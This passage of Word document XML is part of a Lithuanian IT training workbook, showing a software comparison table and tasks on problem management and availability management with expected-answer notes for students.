                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Greitesnis reakcijos laikas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DE6F10F" w14:textId="5D48FDC4" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Ataskait</w:t>
            </w:r>
            <w:r w:rsidR="00C94383" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ų teikimas bet kuriuo įrenginiu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FBAB5CC" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nelaimės atkūrimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48DD3BEF" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>30 d. nemokama versija</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A511E15" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>300$/mėn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F74232" w:rsidRPr="005A5C28" w14:paraId="751F98D0" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11849CE7" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="278407E3" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F2F4B43" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2466FADF" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DB2F2F6" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58364E69" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AF3935" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">5 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PROBLEMŲ VALDYMAS. SAVIKONTROLĖS KLAISIMAI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE392F" w14:textId="0BA22EB5" w:rsidR="00F71A65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI / LAUKIAMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidR="00F71A65" w:rsidRPr="005A5C28">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384FA067" w14:textId="65623E59" w:rsidR="00AE1A9B" w:rsidRPr="005A5C28" w:rsidRDefault="00F71A65"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viri klausimai.</w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokiniai turėtų pateikti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>individualius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atsakymus, paremtus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>asmenine patirtimi, žiniomis, supratimu, gebėjimais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A3473" w14:textId="77777777" w:rsidR="00F71A65" w:rsidRPr="005A5C28" w:rsidRDefault="00F71A65" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4629D3" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">6 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASIEKIAMUMO VALDYMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E879F4" w14:textId="5ECF14D2" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>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98"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="3317"/>
        <w:gridCol w:w="2063"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2E2B64D6" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="691" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F9B73DB" w14:textId="09FD7C72" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="00131ECD" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09B8A02F" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Įrangos pavadinimas: versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AE5D5DD" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Pagrindiniai privalumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3317" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E4A27E6" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Pagrindiniai trūkumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2063" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DE96743" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1BB61061" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C82402" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061A3866" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>VPN programinė įranga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F24219" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Darbas nuotoliniu būdu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3317" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06DE96E5" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Būtina vartotojo priežiūra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2063" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="244F928E" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://openvpn.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3F499DDF" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="329F14F5" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF3CBEE" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Bevielės prieigos taškas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72E32387" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Belaidė prieiga prie tinklo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3317" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ED6E97B" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nekontroliuojamas tinklo valdymas, rekomenduojama individuali autorizacija tinkle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2063" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65C7DBD6" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6C2F998B" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063A5AE4" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BD9F5E" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Serveris, paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10979804" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3317" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22AF9424" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
